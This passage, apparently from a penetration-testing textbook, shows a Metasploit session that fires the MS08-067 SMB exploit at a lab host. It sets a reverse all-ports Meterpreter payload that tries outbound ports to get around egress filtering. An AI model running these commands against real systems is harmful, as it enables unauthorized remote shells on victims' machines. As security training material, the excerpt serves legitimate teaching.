The Joy of Exploitation
71
This type of exploit, called a
heap-based attack
, takes advantage of dynamic
memory allocation, but it isn’t 100 percent reliable. (You may need to attempt
the
exploit
command a few times if it doesn’t work the first time.)
Notice in this example that we used a
bind
shell to set up a listener port
on the target machine; Metasploit handles the direct connection to the system
automatically for us. (Remember to use the reverse payload when attacking
through a firewall or NAT.)
All-Ports Payloads: Brute Forcing Ports
In the preceding examples, we’ve relied on the reverse port always being
open. But what if we’re attacking an organization with very strict egress port
filtering? Most companies block outbound connections except those from a
few defined ports, and it can be difficult to determine which ports can make
outbound connections.
We can guess that port 443 won’t be inspected and will allow a TCP con-
nection out, and that FTP, Telnet, SSH, and HTTP may be allowed. But why
guess when Metasploit has a very specific payload for use in finding open ports?
Metasploit’s payload will try every available port until it finds an open
one. (Going through the entire port range [1–65535] can take quite a long
time, however.)
Let’s use this payload and have it try all ports connecting outbound until
we get one that is successful:
msf >
use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
set LHOST 192.168.33.129
lhost => 192.168.33.129
smsf exploit(ms08_067_netapi) >
set RHOST 192.168.33.130
rhost => 192.168.33.130
msf exploit(ms08_067_netapi) >
set TARGET 3
target => 3
msf exploit(ms08_067_netapi) >
search ports
[*] Searching loaded modules for pattern 'ports'...
Compatible Payloads
===================
Name
Rank Description
----
---- -----------
windows/dllinject/reverse_tcp_allports
normal Reflective Dll Injection,
Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective
Injection), Reverse All-Port TCP Stager
. . . SNIP . . .
msf exploit(ms08_067_netapi) >
set PAYLOAD windows/meterpreter/reverse_tcp_allports
payload => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) >
exploit -j
[*] Exploit running as background job.